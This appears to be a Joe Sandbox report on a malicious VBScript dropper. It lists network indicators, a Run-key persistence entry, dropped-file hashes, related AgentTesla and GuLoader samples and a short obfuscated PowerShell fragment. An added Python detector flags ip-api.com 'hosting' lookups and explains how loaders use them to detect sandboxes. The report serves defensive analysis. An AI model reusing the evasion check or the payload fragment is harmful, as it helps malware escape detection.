            http://x1.c.lencr.org/0 | wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://x1.i.lencr.org/0 | wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/ | powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://ip-api.com | wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://r3.o.lencr.org0 | wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.google.com | powershell.exe, 00000005.00000002.1942203516.00000225820DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.google.com | powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://apis.google.com | powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://drive.google.com/i | wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
114.142.162.17 | mail.cash4cars.nz | Australia | 133525 | SERVERMULE-AS-APNimbus2PtyLtdAU | true
142.250.101.113 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.251.2.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1430754
                                                      Start date and time:2024-04-24 06:45:19 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 14s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:26
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:G4-TODOS.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@5/4
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 90%
                                                      • Number of executed functions: 34
                                                      • Number of non-executed functions: 13
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 2080 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4632 because it is empty
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
05:47:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
05:47:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
06:46:05 | API Interceptor | 4036x Sleep call for process: powershell.exe modified
06:47:02 | API Interceptor | 84x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context

208.95.112.1:
  RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | ip-api.com/json/
  explorer.exe | malicious | RedLine, XWorm | ip-api.com/line/?fields=hosting
  X1.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
  Output.exe | malicious | RedLine, XWorm | ip-api.com/line/?fields=hosting
  X2.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
  55HUe105hhh123333.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
  PI88009454 007865EQ.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
  Request for Quotation.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
  Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | ip-api.com/line/?fields=hosting
  QUOTATION_APRQTRA031244úPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting

114.142.162.17:
  http://otahuhumainstreet.co.nz | malicious | Unknown | otahuhumainstreet.co.nz/
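Nearly every related sample that touched 208.95.112.1 requested ip-api.com/line/?fields=hosting, which is the network side of the "Check if machine is in data center or colocation facility" signature: the service's hosting field tells the caller whether its public address belongs to a datacenter range, and a loader that gets "true" assumes a sandbox or analyst VPS and stops. The detection below is an added example written for this page, not Joe Sandbox code and not part of the report. It scans proxy-log lines for such lookups and separates a plain geo query from one that asks for network-ownership fields. The log format and every log line are constructed; only the two ip-api.com URLs come from the report, and the extra lookup hosts are assumptions so the rule is not a single-string match.

```python
"""Find external-IP lookups used as sandbox/VPS checks in proxy logs.

Added example for this report; it is not Joe Sandbox code. The context
column above shows related samples requesting ip-api.com/line/?fields=hosting
and ip-api.com/json/. ip-api.com's 'hosting' field reports whether the
caller's public address belongs to a hosting/datacenter range, which is
how a loader decides it is running in a sandbox or on an analyst's VPS.
The log format and every log line below are constructed for the example;
only the two ip-api.com URLs are taken from the report.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Public IP-lookup services. Only ip-api.com appears in the report; the other
# hosts are assumptions so the rule is not a single-string match.
LOOKUP_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org", "ifconfig.me"}

# ip-api.com fields that describe the network rather than the location;
# asking for them turns a geo lookup into an environment check.
ENVIRONMENT_FIELDS = {"hosting", "proxy", "mobile", "isp", "org", "as", "asname"}

# Constructed log format: time client process method url status
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)

SAMPLE_LOG = """\
2024-04-24T06:46:31Z 10.0.0.12 powershell.exe GET https://drive.usercontent.google.com/download?id=EXAMPLE 200
2024-04-24T06:47:02Z 10.0.0.12 wab.exe GET http://ip-api.com/line/?fields=hosting 200
2024-04-24T06:47:03Z 10.0.0.12 wab.exe GET http://ip-api.com/json/ 200
2024-04-24T06:47:10Z 10.0.0.31 chrome.exe GET https://ipinfo.io/json 200
"""


def classify(url: str) -> tuple[str, list[str]]:
    """Return (host, reasons); an empty reasons list means nothing of interest."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons: list[str] = []
    if host not in LOOKUP_HOSTS:
        return host, reasons
    reasons.append("public IP lookup service")
    requested: set[str] = set()
    for value in parse_qs(parts.query).get("fields", []):
        requested.update(f.strip().lower() for f in value.split(","))
    hit = sorted(requested & ENVIRONMENT_FIELDS)
    if hit:
        reasons.append("environment check via fields=" + ",".join(hit))
    elif host == "ip-api.com" and not requested:
        # With no field list ip-api returns its default record, which already
        # carries isp/org/as, enough to recognise a cloud provider.
        reasons.append("default ip-api record requested (includes isp/org/as)")
    return host, reasons


def scan(log_text: str) -> list[dict]:
    """Parse the log and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host, reasons = classify(m["url"])
        if not reasons:
            continue
        severity = "high" if len(reasons) > 1 else "low"
        findings.append({
            "time": m["ts"], "client": m["client"], "process": m["proc"],
            "host": host, "url": m["url"], "severity": severity, "reasons": reasons,
        })
    return findings


def interpret_line_response(body: str, fields: list[str]) -> dict[str, str]:
    """Map an ip-api /line/ response (one value per line, in the order the
    'fields' parameter listed them) back to field names."""
    values = body.strip().splitlines()
    return dict(zip(fields, values))


def looks_like_analysis_box(body: str) -> bool:
    """What the malware decides from /line/?fields=hosting: 'true' means a
    datacenter/colocation address, so the loader would stop here."""
    return interpret_line_response(body, ["hosting"]).get("hosting") == "true"


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["process"], f["url"], "; ".join(f["reasons"]))
```

A browser hitting ipinfo.io is reported at low severity because users do look up their own IP; a non-browser process asking specifically for hosting is the high-severity case. When reproducing the check in a lab, answering the lookup with "false" (or sinkholing ip-api.com) is what keeps a GuLoader-style sample running long enough to reach the payload stage.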
Match | Associated Sample Name / URL | Detection | Threat Name | Context

ip-api.com:
  RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | 208.95.112.1
  explorer.exe | malicious | RedLine, XWorm | 208.95.112.1
  X1.exe | malicious | XWorm | 208.95.112.1
  Output.exe | malicious | RedLine, XWorm | 208.95.112.1
  X2.exe | malicious | XWorm | 208.95.112.1
  55HUe105hhh123333.exe | malicious | AgentTesla | 208.95.112.1
  PI88009454 007865EQ.exe | malicious | AgentTesla | 208.95.112.1
  file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 208.95.112.1
  Request for Quotation.exe | malicious | AgentTesla | 208.95.112.1
  Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1

mail.cash4cars.nz:
  Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader | 114.142.162.17
  rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader | 114.142.162.17
  charesworh.exe | malicious | AgentTesla | 114.142.162.17
  FAR.N°2430-24000993.exe | malicious | AgentTesla | 114.142.162.17
  tems.exe | malicious | AgentTesla | 114.142.162.17
  20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  justificante.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  Transferencia 4334300002017359pdf.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  20220830_ProtecoPTE.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  Klkket.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17

bg.microsoft.map.fastly.net:
  http://rum.browser-intake-foxbusiness.com:443 | malicious | Unknown | 199.232.214.172
  SecuriteInfo.com.Win32.CrypterX-gen.1582.25294.exe | malicious | PureLog Stealer, RedLine, zgRAT | 199.232.210.172
  ScreenConnect.Client.exe | malicious | ScreenConnect Tool | 199.232.210.172
  6W9hpMEmjY.exe | malicious | Unknown | 199.232.214.172
  6W9hpMEmjY.exe | malicious | Unknown | 199.232.214.172
  cncUVRcGoI.exe | malicious | Unknown | 199.232.210.172
  https://www.admin-longin.co.jp.mc3lva.cn/ | malicious | Unknown | 199.232.210.172
  https://www.longin-eki.co.jp.zurxyjp.cn/ | malicious | Unknown | 199.232.214.172
  https://xxnewmac5xx.z13.web.core.windows.net/ | malicious | Unknown | 199.232.210.172
  https://windowdefalerts-error0x21916-alert-virus-detected.pages.dev/ | malicious | HTMLPhisher, TechSupportScam | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context

SERVERMULE-AS-APNimbus2PtyLtdAU:
  Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader | 114.142.162.17
  rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader | 114.142.162.17
  charesworh.exe | malicious | AgentTesla | 114.142.162.17
  FAR.N°2430-24000993.exe | malicious | AgentTesla | 114.142.162.17
  tems.exe | malicious | AgentTesla | 114.142.162.17
  20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  justificante.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  Transferencia 4334300002017359pdf.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  20220830_ProtecoPTE.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17
  Klkket.vbe | malicious | AgentTesla, GuLoader | 114.142.162.17

TUT-ASUS:
  RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | 208.95.112.1
  explorer.exe | malicious | RedLine, XWorm | 208.95.112.1
  X1.exe | malicious | XWorm | 208.95.112.1
  Output.exe | malicious | RedLine, XWorm | 208.95.112.1
  X2.exe | malicious | XWorm | 208.95.112.1
  55HUe105hhh123333.exe | malicious | AgentTesla | 208.95.112.1
  PI88009454 007865EQ.exe | malicious | AgentTesla | 208.95.112.1
  file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 208.95.112.1
  Request for Quotation.exe | malicious | AgentTesla | 208.95.112.1
  Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context

3b5074b1b5d032e5620f69f9f700ff0e (context for every row: 142.250.101.113, 142.251.2.132):
  purchase order pdf.exe | malicious | AgentTesla
  PO 23JC0704-Rollease-B.exe | malicious | AgentTesla
  3Shape Unite Installer.exe | malicious | Unknown
  ScreenConnect.Client.exe | malicious | ScreenConnect Tool
  ScreenConnect.Client.exe | malicious | ScreenConnect Tool
  X1.exe | malicious | XWorm
  Output.exe | malicious | RedLine, XWorm
  X2.exe | malicious | XWorm
  BARSYL SHIPPING Co (VIETNAM).exe | malicious | AgentTesla
  https://www.admin-longin.co.jp.mc3lva.cn/ | malicious | Unknown

37f463bf4616ecd445d4a1937da06e19 (context for every row: 142.250.101.113, 142.251.2.132):
  回复 BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | malicious | Unknown
  181_960.msi | malicious | Unknown
  UXNob1Dp32.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  3CB27VUHRg.exe | malicious | Babuk, Djvu
  mJVVW85CnW.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  JfOWsh7v0r.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  AaIo4VGgvO.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  file.exe | malicious | Vidar
  file.exe | malicious | Vidar
  768.xla.xlsx | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name

C:\Users\user\AppData\Roaming\newfile\newfile.exe:
  Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader
  rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader
  Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader
  Request for Proposal Quote_2414976·pdf.vbs | malicious | GuLoader, Lokibot
  Documentos adjuntos.vbe | malicious | AgentTesla, GuLoader
  20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe | malicious | AgentTesla, GuLoader
  FAR.Nº2430-24000993.vbe | malicious | AgentTesla, GuLoader
  justificante.vbe | malicious | AgentTesla, GuLoader
  Transferencia 4334300002017359pdf.vbe | malicious | AgentTesla, GuLoader
  RFQ-16042024-2_2403872952 .pdf.vbs | malicious | AgentTesla, GuLoader
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.886255615007755
                                                                          Encrypted:false
                                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:@...e................................. ..............@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):435476
                                                                          Entropy (8bit):5.9667353614117955
                                                                          Encrypted:false
                                                                          SSDEEP:12288:IF/Nl8r9aEgkJz+6+BFEOkCjZ6EpJsrAl:IFb8r9HgkZRKZ6E/
                                                                          MD5:CED110AE799F108BA8DD3020A033596B
                                                                          SHA1:43D40C2EE9C3DA906E6A1FCD44992ED06685C637
                                                                          SHA-256:E374E8259A203F3C0610D2F18F59B9338F52A6514F635CDA5CCF7CA88243C08F
                                                                          SHA-512:225A95EBB985BBC313734097F0EAED503352CCBDB9F33894297E4FA8D76D159BED7FE4761DF87A004A178DAA12F9FC8BE16AF03F7D9FDCFBBF84FC18D9135F24
                                                                          Malicious:false
                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):516608
                                                                          Entropy (8bit):6.035530871194082
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                          MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                          SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                          SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                          SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                          Joe Sandbox View:
• Filename: Gestión Pago a Proveedores - Liquidación anticipo.hta, Detection: malicious
• Filename: rPayment_AdviceJ001222042024.bat, Detection: malicious
• Filename: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs, Detection: malicious
• Filename: Request for Proposal Quote_2414976·pdf.vbs, Detection: malicious
• Filename: Documentos adjuntos.vbe, Detection: malicious
• Filename: 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe, Detection: malicious
• Filename: FAR.Nº2430-24000993.vbe, Detection: malicious
• Filename: justificante.vbe, Detection: malicious
• Filename: Transferencia 4334300002017359pdf.vbe, Detection: malicious
• Filename: RFQ-16042024-2_2403872952 .pdf.vbs, Detection: malicious
                                                                          File type:ASCII text, with very long lines (361), with CRLF line terminators
                                                                          Entropy (8bit):5.345832920092104
                                                                          TrID:
                                                                          • Visual Basic Script (13500/0) 100.00%
                                                                          File name:G4-TODOS.vbs
                                                                          File size:8'460 bytes
                                                                          MD5:0894754b81c21bfa79481c3940d134d5
                                                                          SHA1:381352cd7b6551606bfb8c07cd77d7c50ffe41cc
                                                                          SHA256:0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4
                                                                          SHA512:ea8fb60de2b0c6f67c2473963348a505fc031e8e361eae051d3a8efdd1a63984c5fe06c4b832a906c76a590c2346bdf19de39a5d5965d1961bee20e421c2f06b
                                                                          SSDEEP:192:jVNOLlEuLpGIxZX2ufM8Nft3fIlikQNJtuMsVU3UbyWzR6zaSLE2mM8ggQTGOKPd:pNOLlEbIxZX2uf9NVQlikQPtsekbyWzx
                                                                          TLSH:5D021A0B09955A3432A1B27FD99B8A05F734C4E9C8B2D6227D3F7F523510C49316EA6D
                                                                          File Content Preview:.. ..Function Befolkningsgruppes ......S6 = S6 & "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundam
                                                                          Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Apr 24, 2024 06:46:10.673455954 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.673505068 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.680540085 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.688302040 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.688361883 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.688393116 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.691349983 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.691414118 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.691442966 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.698584080 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.698642015 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.698671103 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.705777884 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.705831051 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.705859900 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.710555077 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.710603952 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.710635900 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.714970112 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.715033054 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.715054035 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.719556093 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.719618082 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.719645977 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.724256039 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.724318981 CEST49707443192.168.2.9142.251.2.132
